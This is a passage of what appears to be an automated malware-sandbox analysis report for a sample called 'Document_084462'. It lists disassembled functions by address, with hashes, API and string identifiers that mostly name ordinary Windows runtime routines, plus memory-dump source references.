                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                              • API String ID: 0-3051831665
                                                                              • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                              • Instruction ID: 6b5a88ed45c43e7caeb7481a0e814519900ebf58a594dcccc048ea186988e810
                                                                              • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                              • Instruction Fuzzy Hash: 9031A172901219BFDB11CBD4CD40EEEBBBDEB84760F004025FD24A72A0EB35DA059B91
                                                                              Function 37AA7460 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: RtlValidateHeap
                                                                              • API String ID: 3446177414-1797218451
                                                                              • Opcode ID: 90aa7f878b21c9e94ace85b2a5e657b309a3b6a2b65e7143e93f90427e565d18
                                                                              • Instruction ID: d6e367068a4114461ec1d913418164a203e3a6645ec27c704fa85f0eafaf18de
                                                                              • Opcode Fuzzy Hash: 90aa7f878b21c9e94ace85b2a5e657b309a3b6a2b65e7143e93f90427e565d18
                                                                              • Instruction Fuzzy Hash: C541F475604295DFEB12CFA4C890BAEBF72FF81221F04865DD82167380DB389905DB95
                                                                              Function 37AC51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@
                                                                              • API String ID: 0-149943524
                                                                              • Opcode ID: e99d1bab03d60f5b3a0a72b87bc5de57f581a53aa25ec06f496829f40919a2a3
                                                                              • Instruction ID: 3235956f7fc19a0d3efcb28c76480900a2d7f67b77f1228f96562d4362b8012a
                                                                              • Opcode Fuzzy Hash: e99d1bab03d60f5b3a0a72b87bc5de57f581a53aa25ec06f496829f40919a2a3
                                                                              • Instruction Fuzzy Hash: 5D329BB4508312ABE714CF14C990B2EB7E1EF88754F60492EF9A5D7290EB74E944CB52
                                                                              Function 37AB5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 631db020b4dd75aab63b94c0dfca1502bcee13a5746a785de8fd2fb0e8e2bcfd
                                                                              • Instruction ID: 687289000943e262935d96db4aa532219d04e48ac85a081fa99019b7dcb5bf34
                                                                              • Opcode Fuzzy Hash: 631db020b4dd75aab63b94c0dfca1502bcee13a5746a785de8fd2fb0e8e2bcfd
                                                                              • Instruction Fuzzy Hash: ED31AE31201B16BFEB559F25CE90B9AFB79FF88754F044025E92087A50DB74E821CB82
                                                                              Function 37B39567 Relevance: 3.1, APIs: 2, Instructions: 62timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 7b7fb1197aff9da645b1d068fe8b59ab98c08140a70e36f615cd2827904559b4
                                                                              • Instruction ID: 6f489cadb1baee0b8aa84f3bcd42b65ac92080a3fae25a7689207bbd6a3d3c09
                                                                              • Opcode Fuzzy Hash: 7b7fb1197aff9da645b1d068fe8b59ab98c08140a70e36f615cd2827904559b4
                                                                              • Instruction Fuzzy Hash: A711EB71B05225EFFB059B5CC995A5DB7B9EB48264F11016EE806E3300DA749D80CB94
                                                                              Function 37B79ED2 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: `$`
                                                                              • API String ID: 0-197956300
                                                                              • Opcode ID: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                              • Instruction ID: 737be7dd80bbc7adf99162b1b0020f6a6cd8918b651b88b13f9340483ba2c8ba
                                                                              • Opcode Fuzzy Hash: 6fdcb962b8def70188f23157c1bc2e236176fcf66154499c8901e01eec91a068
                                                                              • Instruction Fuzzy Hash: 0BC1BFB1208381DBF754CE28C881B5BBBF5EF84764F044A2DF9A5DA290D776E544CB42
                                                                              Function 37B3174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$AddD
                                                                              • API String ID: 0-2525844869
                                                                              • Opcode ID: eb159337ffeaa63080428748f9634879addf4bef7c0f4ac42095f73e3f69548f
                                                                              • Instruction ID: a6e0b398a59e91f89c2aa73428a50419d82c0ed90cd79d29ada2bcf8e2f741d0
                                                                              • Opcode Fuzzy Hash: eb159337ffeaa63080428748f9634879addf4bef7c0f4ac42095f73e3f69548f
                                                                              • Instruction Fuzzy Hash: 09A17AB6105304AFF314CB14C944BABB7FDFB84715F544A2EF9A486190E770E9498B62
                                                                              Function 37B53F54 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$MUI
                                                                              • API String ID: 0-17815947
                                                                              • Opcode ID: 0a0155d623486ecd40ad91d749403e0766bb35773a0870a64b0fd26d0af7c231
                                                                              • Instruction ID: 196eaf426025b01955d74f47d4dfb0997426d7b4a35d4058e8370c8e66637022
                                                                              • Opcode Fuzzy Hash: 0a0155d623486ecd40ad91d749403e0766bb35773a0870a64b0fd26d0af7c231
                                                                              • Instruction Fuzzy Hash: 595126B5D0021DAEEF11DFA5CD80AEFBBB9EB08764F104529F911A7280D635AD19CB60
                                                                              Function 37B8B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • RedirectedKey, xrefs: 37B8B60E
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 37B8B5C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                              • API String ID: 0-1388552009
                                                                              • Opcode ID: 422355fdc429f8a0550d28d65da09a9e524c64c9adf6e7aa3853c1f154af8cbc
                                                                              • Instruction ID: be87c7a7ac20c1df81b0c87f990bc0240350ea6009f33c3d367e2849f2becd1a
                                                                              • Opcode Fuzzy Hash: 422355fdc429f8a0550d28d65da09a9e524c64c9adf6e7aa3853c1f154af8cbc
                                                                              • Instruction Fuzzy Hash: F461F7B9D00269EBEB11DFE8C948ADEBFB8FB08715F50415AE815A7200DB349A46CF51
                                                                              Function 37ACF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$$
                                                                              • API String ID: 3446177414-233714265
                                                                              • Opcode ID: f0a7e9a7e60d9fabbadb041b2258ff3855cee7a8d4fd2a32a2699d39a6556132
                                                                              • Instruction ID: 75ece5019575f22c6a9db70668cb33b23b0d8eee3fae544dc0275c20e18729ee
                                                                              • Opcode Fuzzy Hash: f0a7e9a7e60d9fabbadb041b2258ff3855cee7a8d4fd2a32a2699d39a6556132
                                                                              • Instruction Fuzzy Hash: A461D176A0174AEBEB20CFA4C681B9DB7F1FF44714F104069E925AB654CB38A941CF81
                                                                              Function 37B4314A Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                              • API String ID: 0-118005554
                                                                              • Opcode ID: 57c7d8b253a2643a93a28a114b10ec80ca0751d71d4519e4afc30d68679cbf7a
                                                                              • Instruction ID: 0e594161aa6485c25eb68202abafb1b9c6ab76f15f97f100f12633dfb015329c
                                                                              • Opcode Fuzzy Hash: 57c7d8b253a2643a93a28a114b10ec80ca0751d71d4519e4afc30d68679cbf7a
                                                                              • Instruction Fuzzy Hash: 4B31E675209751ABE301CB68D880B2AB7F4EF89760F580859FC64DB390EB35E905C763
                                                                              Function 37AE31BE Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .Local\$@
                                                                              • API String ID: 0-380025441
                                                                              • Opcode ID: e2262ef94000436b588440a1b727f55caf33a0216aa6aa9a85cf7239d57eebbb
                                                                              • Instruction ID: 5d67fefdc121412c971ea96e41b937364f530e6c7bdafe85401b0c4f2780cc1c
                                                                              • Opcode Fuzzy Hash: e2262ef94000436b588440a1b727f55caf33a0216aa6aa9a85cf7239d57eebbb
                                                                              • Instruction Fuzzy Hash: 9E319EB2509301AFD310CF28C980A9BBBECEB99654F00192EFDE483650D635DD098B93
                                                                              Function 37AE33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 37B2289F
                                                                              • RtlpInitializeAssemblyStorageMap, xrefs: 37B2289A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                              • API String ID: 0-2653619699
                                                                              • Opcode ID: aa3f2ea28e828d2b1d726423630d4fa162a76695d8df0b54ab5162927ef60884
                                                                              • Instruction ID: 95f134f83ae3ce09f39fa247e415f4f281e8dc5279e264f6089efd65cf236bd2
                                                                              • Opcode Fuzzy Hash: aa3f2ea28e828d2b1d726423630d4fa162a76695d8df0b54ab5162927ef60884
                                                                              • Instruction Fuzzy Hash: 371132B2B01219BFF7158A48CD41FAA36ECDB88760F618029FE14EB244EA74DD0087A1
                                                                              Function 37AB1051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 599e517962f56ccd962899a552840a3cc3b7d0de34748d7e0347c0a2602e5511
                                                                              • Instruction ID: 412b6bb67a614df0f2adb046582c805565d7c635e7ea330cc30476eacf3da872
                                                                              • Opcode Fuzzy Hash: 599e517962f56ccd962899a552840a3cc3b7d0de34748d7e0347c0a2602e5511
                                                                              • Instruction Fuzzy Hash: D4B100B56093809FE754CF28C980A5ABBF1BB88314F14496EF899D7352D735E845CB82
                                                                              Function 37B355E0 Relevance: 1.7, APIs: 1, Instructions: 246COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 678952c9c85b6d1dc11241bdafcd76f1b51fed1c1de9c9eb27ee0ce8e77c20bc
                                                                              • Instruction ID: 1c57ee8d46878eda635ea6f38fdeb7f8625e3705dfaa50b3bcbaf2a6463b0c30
                                                                              • Opcode Fuzzy Hash: 678952c9c85b6d1dc11241bdafcd76f1b51fed1c1de9c9eb27ee0ce8e77c20bc
                                                                              • Instruction Fuzzy Hash: 028140B5A01309ABEB11DFA5CD84EAFBBF8EF48750F100129F925A7190DA75AD40CB51
                                                                              Function 37AB7623 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ab328ad9286693226110e83f8e8f61878de7498721568ca8723fb5f65eda8dfe
                                                                              • Instruction ID: f0f46d7173c0ac826b91bea84d8d4fc08832e476fd54be00377f30124c9ee974
                                                                              • Opcode Fuzzy Hash: ab328ad9286693226110e83f8e8f61878de7498721568ca8723fb5f65eda8dfe
                                                                              • Instruction Fuzzy Hash: 7D618475A00606AFDB18CF78C980B9DFBB5FF88354F14816ED829A7340DB74A9418F91
                                                                              Function 37AAB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 535ede966be977c32524e3db67ec9af2d91b9a4d4ff6ba517e8c64587fdef8ad
                                                                              • Instruction ID: 3818150431bb54fe4ddd2799f02fada3ffcb56d0afea7ad44d1c264dd59d0544
                                                                              • Opcode Fuzzy Hash: 535ede966be977c32524e3db67ec9af2d91b9a4d4ff6ba517e8c64587fdef8ad
                                                                              • Instruction Fuzzy Hash: 0A3121B2650204AFC751DF14C980A6A77F5EF84364F10426AED659F2A1CB35ED42CFD0
                                                                              Function 37AB56E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 7c4169d2cb0f4862319f602031cc2a3c785a513e3cb20d5bffed926106a9667c
                                                                              • Instruction ID: e10bd616a3ae56cb8519a753010019a4fdb048eabb84bd47fd32a49d36c3bf11
                                                                              • Opcode Fuzzy Hash: 7c4169d2cb0f4862319f602031cc2a3c785a513e3cb20d5bffed926106a9667c
                                                                              • Instruction Fuzzy Hash: F9319879715A06FFEB558B24CE80BA9BBBAFF88250F405055EC108BA50DB35E931CF81
                                                                              Function 37AB3536 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: 0d9113c69652fae488fc70ba004645336bbfd11fe376fafcbf5815e75196ac0c
                                                                              • Instruction ID: 3b5fdcd3c9abab438e1edf582fe43123f08de2d1bdb84ff8dff73ff09e6cf04c
                                                                              • Opcode Fuzzy Hash: 0d9113c69652fae488fc70ba004645336bbfd11fe376fafcbf5815e75196ac0c
                                                                              • Instruction Fuzzy Hash: B6210675105644AFEB31EF04CA84B1BBBB8FFC8B24F415159EC614B690DAB4E849CB93
                                                                              Function 37AA92AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: c35a7b8bb2c9f469a9387e4e3f9b6a813a0fe933e6d1b29c140b89b186b56c43
                                                                              • Instruction ID: 35a24c792733b284ef53e7e8a09d1fb185f3df6e8983d418beecb0d347dc14a2
                                                                              • Opcode Fuzzy Hash: c35a7b8bb2c9f469a9387e4e3f9b6a813a0fe933e6d1b29c140b89b186b56c43
                                                                              • Instruction Fuzzy Hash: 98F0FA32204700BBD331DB08CC05F9ABBFDEF84B10F04011DA94693090CAA4F909CB60
                                                                              Function 37B39603 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28384487fe8f645e75c36544f7c5fce5408928f257369af79a2dc5a3c347201c
                                                                              • Instruction ID: 2060dd0dfdef4bdcb443f16f53eabfcfecc9a038c30d0a225f62e98f86af4378
                                                                              • Opcode Fuzzy Hash: 28384487fe8f645e75c36544f7c5fce5408928f257369af79a2dc5a3c347201c
                                                                              • Instruction Fuzzy Hash: 81E0E5B2712214AFFB00DB58D842F4A33FCEB8879CF040098F40AD3140D664DD41D650
                                                                              Function 00133609 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: r
                                                                              • API String ID: 0-1812594589
                                                                              • Opcode ID: 3ecb13d64c7410fdf1db3de70f16e35d23cdadde7f36aea862eb2870d717e0f9
                                                                              • Instruction ID: 2c69100c541ebcd8c41de364643424a04ff9c5e3668d81ca81e5fcb5dda811a1
                                                                              • Opcode Fuzzy Hash: 3ecb13d64c7410fdf1db3de70f16e35d23cdadde7f36aea862eb2870d717e0f9
                                                                              • Instruction Fuzzy Hash: 87A1C27060CB848FD7A9DB2DC054B6ABBE2BBD8304F54496DA1DAC3261DB34D945CB06
                                                                              Function 0013392A Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13274647098.0000000000120000.00000040.00001000.00020000.00000000.sdmp, Offset: 00120000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_120000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: g
                                                                              • API String ID: 0-30677878
                                                                              • Opcode ID: 8534f3a207cccaa6da4799c7345a4c876ca3cfc63f280af61bc2d420abba10b0
                                                                              • Instruction ID: e88874081bc3537ef78613abd7deea4e570a0fffde25a2976349c229c959b590
                                                                              • Opcode Fuzzy Hash: 8534f3a207cccaa6da4799c7345a4c876ca3cfc63f280af61bc2d420abba10b0
                                                                              • Instruction Fuzzy Hash: 1491D43060CB848FD7A9DB2CC454B6ABBE2FBD8304F54896DA1DAC3261DB34D944DB46
                                                                              Function 37AB965A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @
                                                                              • API String ID: 0-2766056989
                                                                              • Opcode ID: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                              • Instruction ID: 0a360750afb680935fd3727ea885cd66d43b674c69bf98fcb000cf9d2ada640d
                                                                              • Opcode Fuzzy Hash: cf001e69a80641a8cc3ed551a73227fc2f86a0353987b9bba849c8e96c1f93c2
                                                                              • Instruction Fuzzy Hash: D0614BB5D05219EBEF21CFA5C940BEEBBF8EF84760F104159E820A7290D7759A41CFA1
                                                                              Function 37B3F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
